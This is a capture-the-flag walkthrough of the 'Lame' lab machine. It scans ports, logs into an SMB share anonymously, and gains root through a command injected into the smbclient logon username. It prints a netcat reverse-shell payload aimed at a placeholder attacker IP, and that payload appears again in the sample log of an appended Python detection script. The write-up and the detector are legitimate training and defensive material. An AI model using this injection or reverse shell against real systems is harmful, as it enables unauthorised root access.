Lame

Start off with a network scan:

nmap -sV -sC -oA nmap/lame 10.10.10.3

[screenshot: nmap scan output]

There are open ports on TCP 21, 22, 139 and 445. Initially, I am interested in the anonymous logon on FTP (21), but there are no notable files there.

So I turn my attention to the SMB share (139, 445) and attempt to log in to the tmp share with the command:

smbclient -N //10.10.10.3/tmp

I am able to log on anonymously to the SMB share and list the available commands.

[screenshot: smbclient session]

I notice that the ‘logon’ command is available in smbclient. So I can start a listener and get a reverse shell with the following commands:

nc -lvnp 6200
logon "./=`nohup nc -e /bin/sh <attacker_ip> 6200`"

I receive a shell running as root. From there I can read both user.txt and root.txt under /home/makis/ and /root/.
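As an added example (not part of the original write-up), here is a small Python audit that flags the two conditions the walkthrough relies on: anonymous access to a share, and a username carrying shell metacharacters like the backtick-laden logon name above. The record layout and the client address 10.10.14.5 are constructed for this example and do not reflect real Samba log formatting.

```python
"""Flag SMB session-setup records showing null-session access or a username
that carries shell metacharacters (the mechanism behind the logon trick)."""
import re
from typing import Optional

# Shell metacharacters that have no place in a legitimate SMB username.
SHELL_META = re.compile(r"[`$;|&<>\n]")

# Field layout is an assumption for this example; real Samba logs differ.
LINE_RE = re.compile(
    r'^(?P<ts>\S+) smbd client=(?P<client>\S+) share=(?P<share>\S+) '
    r'user="(?P<user>[^"]*)"'
)

# Constructed sample records (not real Samba output). The second line carries
# the injected logon name from the write-up with a constructed client address.
SAMPLE_LOG = """\
2024-01-01T10:00:01 smbd client=10.10.14.5 share=tmp user=""
2024-01-01T10:00:09 smbd client=10.10.14.5 share=tmp user="./=`nohup nc -e /bin/sh 10.10.14.5 6200`"
2024-01-01T10:01:12 smbd client=10.10.10.40 share=tmp user="makis"
2024-01-01T10:02:30 smbd client=10.10.10.40 share=tmp user="first.last"
"""


def parse_line(line: str) -> Optional[dict]:
    """Return the record's fields, or None if the line is not a session-setup record."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def username_is_suspicious(user: str) -> bool:
    """True when the username contains characters a shell would interpret."""
    return bool(SHELL_META.search(user))


def audit(log_text: str) -> list:
    """Return one finding per record that is anonymous or carries a hostile username."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["user"] == "":
            findings.append({**rec, "reason": "anonymous (null-session) access"})
        elif username_is_suspicious(rec["user"]):
            findings.append({**rec, "reason": "shell metacharacters in username"})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_LOG):
        print(f"{f['ts']} {f['client']} share={f['share']}: {f['reason']}")
```

Running it against the constructed records reports the null session and the injected username while leaving the two ordinary logons alone.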

[screenshot: root shell]